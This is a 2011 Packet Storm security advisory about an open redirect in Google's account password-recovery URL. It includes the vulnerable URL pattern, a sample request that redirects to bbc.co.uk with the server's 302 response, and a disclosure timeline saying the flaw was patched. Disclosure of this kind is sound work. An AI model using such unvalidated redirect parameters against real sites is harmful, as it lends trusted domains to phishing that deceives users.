Google.com Open Redirect

2011-11-09T00:00:00
ID PACKETSTORM:106755
Type packetstorm
Reporter Anastasios Monachos
Modified 2011-11-09T00:00:00

Description

                                        
                                            `=======================================================================  
Google.com - Open Redirect  
=======================================================================  
  
Affected Domain : Google.com  
Severity : Very Low  
Local/Remote : Remote  
Vulnerable URL : https://www.google.com/accounts/recovery/resetpassword?url=http://<any_domain>  
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]  
  
[Summary]  
  
Due to a parameter filtering bug any supplied input is accepted; as result redirects a user to the parameter value without any validation.  
  
  
[Vulnerability Details]  
  
GET Request:  
------------  
GET https://www.google.com/accounts/recovery/resetpassword?url=http://www.bbc.co.uk HTTP/1.1  
Host: www.google.com  
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
  
GET Response:  
-------------  
HTTP/1.1 302 Moved Temporarily  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Pragma: no-cache  
Expires: Fri, 01 Jan 1990 00:00:00 GMT  
Date: Wed, 26 Oct 2011 18:44:19 GMT  
Content-Type: text/html; charset=UTF-8  
Set-Cookie: mainpageaccountrecoveryparamscookie=; Expires=Wed, 02-Nov-2011 18:44:19 GMT; Path=/accounts/recovery; Secure; HttpOnly  
Location: http://www.bbc.co.uk  
X-Content-Type-Options: nosniff  
X-Frame-Options: SAMEORIGIN  
X-XSS-Protection: 1; mode=block  
Server: GSE  
  
<HTML>  
<HEAD>  
<TITLE>Moved Temporarily</TITLE>  
</HEAD>  
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">  
<H1>Moved Temporarily</H1>  
The document has moved <A HREF="http://www.bbc.co.uk">here</A>.  
</BODY>  
</HTML>  
  
  
[Time-line]  
  
25/10/2011 - Google notified  
26/10/2011 - Google responded  
02/11/2011 - Vendor patch released  
08/11/2011 - Public disclosure  
`